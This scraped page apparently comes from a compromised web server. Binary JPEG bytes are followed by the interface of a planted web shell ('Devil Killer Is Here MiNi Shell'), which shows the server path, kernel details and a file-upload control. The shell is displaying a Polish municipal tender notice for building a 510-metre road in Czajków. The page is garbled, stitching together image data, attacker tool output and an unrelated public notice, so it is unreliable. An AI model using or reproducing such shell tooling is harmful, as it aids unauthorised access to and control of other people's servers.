JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220331/0010444201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa drogi na ulicy Leśnej w Czajkowie na odcinku o długości 510 metrów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Czajków</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250855593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">-</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czajków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-524</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">627311006</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">627311034</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugczajkow@xl.wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.czajkow-gmina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa drogi na ulicy Leśnej w Czajkowie na odcinku o długości 510 metrów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a3359a08-b0b9-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00104442</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00340554/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa ulicy Leśnej w Czajkowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.czajkow-gmina.pl/wiadomosci/3/lista/przetargi <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016), dalej RODO, informuję, że: 1) administratorem Pani/Pana danych osobowych<br/>jest Gmina Czajków , Czajków 39, 63-524 Czajków, tel.: (62) 731-10-06, e-mail:ugczajkow@xl.wp.pl 2)administrator wyznaczył<br/>Inspektora Ochrony Danych. Można się z nim skontaktować listowanie na adres: Czajków 39, 63-524 Czajków lub przez e-mail:<br/>ugczajkow@xl.wp.pl, 3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>niniejszym postępowaniem o udzielenie zamówienia publicznego,4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.8 oraz art. 96 ust. 3 Pzp,5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, a po tym<br/>czasie przez okres oraz w zakresie wymaganym przez przepisy ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i<br/>archiwach, 6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp,7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO,8) posiada Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących, b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *, c)na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **, d) prawo do wniesienia skargi do Prezesa<br/>Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO, 9) nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych, b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20RODO,c) na podstawie art. 21RODO prawo<br/>sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.* skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z Pzp oraz nie może naruszać integralności<br/>protokołu oraz jego załączników** prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 487804,88 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach robót w zakresie budowy drogi na ulicy Leśnej w Czajkowie na odcinku o długości 510 metrów zakłada się – roboty pomiarowe przy liniowych robotach ziemnych – trasa dróg w terenie równinnym wraz z inwentaryzacją powykonawczą,<br/>roboty ziemne wykonywane koparkami podsiębiernymi o pojemności łyżki 0,25m3 w gruncie kategorii III z transportem urobku na odległość powyżej 1 km samochodami<br/>samowyładowczymi, formowanie i zagęszczanie nasypów o wysokości do 3 metrów spycharkami w gruncie kat. I – II, profilowanie i zagęszczanie podłoża wykonywane<br/>mechanicznie w gruncie kat. II – IV pod warstwy konstrukcyjne nawierzchni, podbudowy betonowe z gruntu stabilizowanego cementem C1,5/2,5 grubości 10cm pielęgnowane piaskiem i wodą, warstwa dolna podbudowy z kruszyw łamanych<br/>mieszanki 0/63 grubości 15cm, wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym zagęszczanym mechanicznie o grubości do 10cm na podjazdach wjazdów do posesji, krawężniki betonowe wystające o wymiarach 15x30cm z wykonaniem ław betonowych z oporem z C8/10 na podsypce cementowo – piaskowej, roboty ziemne wykonywane koparkami podsiębiernymi o pojemności łyżki 0,15m3 w gruncie kategorii III z transportem urobku na odległość powyżej 1 km samochodem samowyładowczym, profilowanie i zagęszczanie podłoża wykonywane ręcznie w gruncie kategorii II – IV pod warstwy konstrukcyjne nawierzchni, podbudowy betonowe z C5/6 grubości 20cm pielęgnowane piaskiem i wodą, chodniki z kostki brukowej betonowej kolorowej grubości 8 cm na podsypce cementowo –<br/>piaskowej z wypełnieniem spoin piaskiem, krawężniki betonowe wtopione o wymiarach 12x25 cm bez ław na podsypce cementowo – piaskowej, ława pod krawężniki betonowa z oporem, regulacja pionowa studzienek dla zaworów wodociągowych i hydrant, remont cząstkowy chodników z kostki betonowej i płyt<br/>betonowych na płask na podsypce piaskowej z wypełnieniem spoin piaskiem, ułożenie rur osłonowych dwudzielnych z PCW o średnicy do 140mm na kablu pod wjazdami łącznie z odkopaniem ręcznym zasypaniem i zagęszczeniem, przepusty rurowe pod zjazdami – rury PCV dwuściankowe o średnicy 40cm na skrzyżowaniu z drogą powiatową łącznie z zaślepieniem wlotu i wylotu korkami PCV, regulacja pionowa studzienek dla włazów kanałowych, ręczne plantowanie powierzchni gruntu rodzimego kategorii I – III, wykopy liniowe lub jamiste o głębokości do 1,5m ze<br/>skarpami o szerokości dna do 1,5 metra w gruncie kategorii III, kanały z rur PVC łączonych na wcisk o średnicy zewnętrznej 160mm przykanaliki, studnie chłonne z kregów średnicy 1 metr i głębokości 2 metry, drenowanie niesystematyczne wykonywane koparkami jednonaczyniowymi z osprzętem do wąskich wąskich<br/>wykopów w terenach nizinnych na głębokość 0,9 metra w gruncie kategorii II – III –rurociąg NPCW średnicy 15cm, płyty żelbetowe na studniach o średnicy 1150/600mm z włazem żeliwnym, zabezpieczenie rurociągów drenarskich o średnicy 15cm przez<br/>owijanie włókniną, studzienki ściekowe uliczne betonowe o średnicy 500mm z osadnikiem bez syfonu, studnie rewizyjne z kręgów betonowych o średnicy 1000mm w gotowym wykopie o głębokości 3 metry, zasypywanie wykopów ze skarpami z<br/>przeżutem na odległość do 3 metrów z zagęszczeniem; kategoria gruntu I – III, zagęszczenie nasypów z gruntu sypkiego kategorii I – II ubijakami mechanicznymi. W ramach zadania przewiduje się wykonanie oświetlenia drogowego w skład którego wchodzi kopanie rowów dla kabli w sposób mechaniczny w gruncie kategorii I – II, kopanie rowów dla kabli w sposób ręczny w gruncie kategorii III, nasypanie warstwy piasku na dnie rowu kablowego o szerokości do 0,4metra, ułożenie rur osłonowych z PCW o średnicy do 140mm, układanie kabli o masie do 1 kg/m w<br/>rowach kablowych ręcznie, układanie kabli o masie do 1kg/m w rurach pustakach lub kanałach zamkniętych, zasypywanie rowów dla kabli wykonanych mechanicznie w gruncie kategorii I – II, zagęszczanie ziemi z gruntu kategorii III na całej trasie<br/>wykopów ubijakami mechanicznymi, montaż i stawianie słupów oświetleniowych o masie do 100kg, montaż przewodów do opraw oświetleniowych – wciąganie w słupy rury osłonowe i wysięgniki przy wysokości latarń do 10 metrów, montaż opraw<br/>oświetlenia zewnętrznego na słupie, podłączenie przewodów pojedynczych o przekroju żyły do 2,5mm2, pod zaciski lub bolce, zarobienie na sucho końca kabla 5-żyłowego o przekroju żył do 50mm2 na napięcie do 1kV o izolacji i powłoce z tworzyw<br/>sztucznych, podłączenie przewodów pojedynczych o przekroju żyły do 50mm2 pod zaciski lub bolce, mechaniczne pogrążanie uziomów pionowych prętowych w gruncie kategorii III, łączenie przewodów instalacji odgromowej lub przewodów<br/>wyrównawczych z bednarki o przekroju do 120 mm2 w wykopie – uchwyt krzyżowy St/Zn-drut St/Zn M10 103 42 Galmar, badanie linii kablowej o ilości żył do 4, przykręcanie tabliczek opisowych, pierwszy pomiar uziemienia ochronnego lub roboczego, inwentaryzacja geodezyjna, projekt organizacji ruchu, zajęcie pasa<br/>drogowego, podłączenie przewodów pojedynczych o przekroju żyły do 50mm2 pod zaciski lub bolce, sprawdzenie i pomiar 1-fazowego obwodu elektrycznego niskiego napięcia, dodatek za uszczelnienie końca rury, fundamenty prefabrykowane<br/>poliestrowe w gruncie kategorii III o objętości w wykopie do 0,25m3pod rozdzielnice, szafka sterowania oświetleniem ulicznym i drogowym, układanie kabli o masie do 1kg/m w budynkach, budowlach lub na estakadach z mocowaniem, zarobienie na<br/>sucho końca kabla 5-żyłowego o przekroju żył do 120mm2 na napięcie do 1kV o izolacji i powłoce z tworzyw sztucznych, montaż uziomów poziomych lub przewodów uziemiających przy głębokości wykopu 0,8 metra w gruncie kategorii III, łączenie<br/>przewodów instalacji odgromowej lub przewodów wyrównawczych z bednarki o przekroju do 120mm2 w wykopie – uchwyt krzyżowy St/Zn-drut ST/Zn M10 103 42 Galmar. Długość przedmiotowego odcinka drogi 510 metrów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">45232200-4 - Roboty pomocnicze w zakresie linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie każdego kryterium: cena i okres gwarancji. Za ofertę<br/>najkorzystniejszą uznana zostanie ta, która uzyska największą ilość punktów zsumowanych w ramach dwóch kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: nie podlegają wykluczeniu: na podstawie art. 108 ust.1 pkt 1-6 ustawy, spełniają warunki udziału w postępowaniu dotyczące: a) kompetencji lub uprawnień do prowadzenia określonej<br/>działalności zawodowej b) sytuacji ekonomicznej lub finansowej: Zamawiający wymaga posiadania przez wykonawcę<br/>odpowiedniego ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzenia działalności na kwotę co najmniej 200000,00 zł. c) zdolności technicznej lub zawodowej: Warunek ten będzie spełniony jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w tym okresie wykonał co najmniej dwie roboty polegające na budowie lub przebudowie dróg na kwotę min. 500000,00 zł brutto każda, Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że w trakcie realizacji zamówienia będzie dysponował osobami posiadającymi uprawnienia do kierowania robotami budowlanymi, które zgodnie z przepisami pozwolą na zrealizowanie przedmiotowego zadania; w specjalności drogowej i elektrycznej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Aktualne na dzień składania ofert oświadczenie – załącznik nr 2 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, oświadczenie, o którym mowa w pkt.VII.1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenie to musi potwierdzać spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w<br/>którym każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. Wykonawca który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia warunków udziału w postępowaniu, w zakresie, w jakim powołuje się na ich zasoby, zamieszcza informację o tych podmiotach w oświadczeniu, o którym mowa w pkt.VII.1. Zamawiający przed udzieleniem zamówienia , zgodnie z Art.274 ust.1 wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących podmiotowych środków dowodowych. Aktualne ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzenia działalności, Wykaz robót budowlanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>robota została wykonana / jest wykonywana oraz załączeniem dowodów określających czy te roboty zostały wykonane należycie - załącznik nr 6 do SWZ. Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego o roboty zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów - oświadczenie Wykonawcy. Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności<br/>gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Wykaz osób skierowanych przez wykonawcę do<br/>realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie robót , kontrolę jakości. Oświadczenie o braku przynależności do tej samej grupy kapitałowej, o której mowa w art.108 ust.1 pkt. 5 ustawy Pzp - załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt.VII.1 SWZ składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenie to musi potwierdzać spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców<br/>wykazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzanie 